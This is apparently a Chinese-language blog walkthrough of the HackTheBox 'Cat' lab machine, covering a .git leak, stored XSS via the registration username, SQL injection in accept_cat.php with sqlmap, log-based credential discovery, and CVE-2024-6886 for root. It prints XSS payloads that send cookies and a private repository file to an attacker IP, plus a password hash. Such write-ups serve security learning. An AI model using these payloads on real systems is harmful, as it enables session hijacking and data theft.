HTB-Cat
|
214
|
0
|
|
HTB-Machine

724 字
|
8 分钟

Box Info

OSLinux
DifficultyMedium

Nmap

[root@kali] /home/kali  
❯ nmap cat.htb

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Dirsearch

存在git泄露

git-dumper获取到源码

[root@kali] /home/kali/Cat  
❯ git-dumper http://cat.htb/.git/ ./catgit

XSS

view_cat.php中发现存在XSS的可能性

<?php
session_start();

include 'config.php';

// Check if the user is logged in
if (!isset($_SESSION['username']) || $_SESSION['username'] !== 'axel') {
    header("Location: /join.php");
    exit();
}

// Get the cat_id from the URL
$cat_id = isset($_GET['cat_id']) ? $_GET['cat_id'] : null;

if ($cat_id) {
    // Prepare and execute the query
    $query = "SELECT cats.*, users.username FROM cats JOIN users ON cats.owner_username = users.username WHERE cat_id = :cat_id";
    $statement = $pdo->prepare($query);
    $statement->bindParam(':cat_id', $cat_id, PDO::PARAM_INT);
    $statement->execute();

    // Fetch cat data from the database
    $cat = $statement->fetch(PDO::FETCH_ASSOC);

    if (!$cat) {
        die("Cat not found.");
    }
} else {
    die("Invalid cat ID.");
}
?>

<div class="container">
    <h1>Cat Details: <?php echo $cat['cat_name']; ?></h1>
    <img src="<?php echo $cat['photo_path']; ?>" alt="<?php echo $cat['cat_name']; ?>" class="cat-photo">
    <div class="cat-info">
        <strong>Name:</strong> <?php echo $cat['cat_name']; ?><br>
        <strong>Age:</strong> <?php echo $cat['age']; ?><br>
        <strong>Birthdate:</strong> <?php echo $cat['birthdate']; ?><br>
        <strong>Weight:</strong> <?php echo $cat['weight']; ?> kg<br>
        <strong>Owner:</strong> <?php echo $cat['username']; ?><br>
        <strong>Created At:</strong> <?php echo $cat['created_at']; ?>
    </div>
</div>

可以看到这里是直接将用户名输出到页面

contest.php中随意上传一个图片,然后等待管理员来查看获取到cookie

因此注入点就是注册时候的用户名

<img src=1 onerror=this.src="http://10.10.xx.xx/?ccc="+encodeURIComponent(document.cookie)>

监听得到cookie

替换后可以进入admin的管理面板

SQL Injection

accept_cat.php中发现了直接拼接的sql语句,cat_name没有经过过滤

<?php
include 'config.php';
session_start();

if (isset($_SESSION['username']) && $_SESSION['username'] === 'axel') {
    if ($_SERVER["REQUEST_METHOD"] == "POST") {
        if (isset($_POST['catId']) && isset($_POST['catName'])) {
            $cat_name = $_POST['catName'];
            $catId = $_POST['catId'];
            $sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
            $pdo->exec($sql_insert);

            $stmt_delete = $pdo->prepare("DELETE FROM cats WHERE cat_id = :cat_id");
            $stmt_delete->bindParam(':cat_id', $catId, PDO::PARAM_INT);
            $stmt_delete->execute();

            echo "The cat has been accepted and added successfully.";
        } else {
            echo "Error: Cat ID or Cat Name not provided.";
        }
    } else {
        header("Location: /");
        exit();
    }
} else {
    echo "Access denied.";
}
?>

config.php中发现了数据库是SQLlite

<?php
// Database configuration
$db_file = '/databases/cat.db';

// Connect to the database
try {
    $pdo = new PDO("sqlite:$db_file");
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
} catch (PDOException $e) {
    die("Error: " . $e->getMessage());
}
?>

因此多半是SQL盲注的类型

[root@kali] /home/kali/Cat/catgit (master) 
❯ sqlmap -u "http://cat.htb/accept_cat.php" --cookie="PHPSESSID=918f1nvps72fc7rvk5umu13jch" --data="catId=1&catName=123" -p catName --dbms=SQLite --level=5

得到四个表

users表中拿到了

rosamendoza485@gmail.com      ac369922d560f17d6eeb8b2c7dec498c

(如果爆不出来,可能需要重启靶机)

到这个网站去解密,我用rockyou.txt好像爆不出来

用这个密码登录rosa的账号,发现还有其他的几个用户

查看apache的日志,得到了axel的密码

rosa@cat:~$ cat /var/log/apache2/access.log | grep axel

登录后拿到user.txt

ROOT

发现了内部开启了3000端口

将其转发出来,发现是一个Git服务

[root@kali] /home/kali  
❯ ssh  rosa@cat.htb -L 3000:127.0.0.1:3000

其版本号是1.22.0,我查询到了一个可能的XSS漏洞

CVE-2024-6886

/var/mail/axel中得到一段留言

需要给jobert发邮件,然后他会检查仓库,造成XSS漏洞

jobert应该是有访问employee-management这个仓库的权限的

<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.xx.xx/?content='+encodeURIComponent(data)))">XSS test</a>

由于25端口是开在127.0.0.1上的,因此也需要将其转发出来

使用以下命令给jobert发邮件

[root@kali] /home/kali  
❯swaks --to "jobert@localhost" --from "axel@localhost" --header "Click" --body "http://localhost:3000/axel/xss" --server localhost

进行url解码拿到密码

拿到root.txt

Summary

User: 通过Git泄露拿到源码, 存在SQL注入漏洞拿到rosa的密码,由于网页的登录表单是通过GET明文传输的,因此在apache的日志中拿到axel的密码,从而拿到user.txt

Root: 将内网3000端口转发出来查找到CVE漏洞,在邮件中得到线索进一步确认是XSS漏洞,employee-management这个仓库自己无法访问只能通过XSS外带,最后在其index.php中拿到了密码

HacktheboxLinux
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
Dockerlabs-Mirame

							
							

							
Dockerlabs-WalkingCMS

							
							

							
Dockerlabs-DanceSamba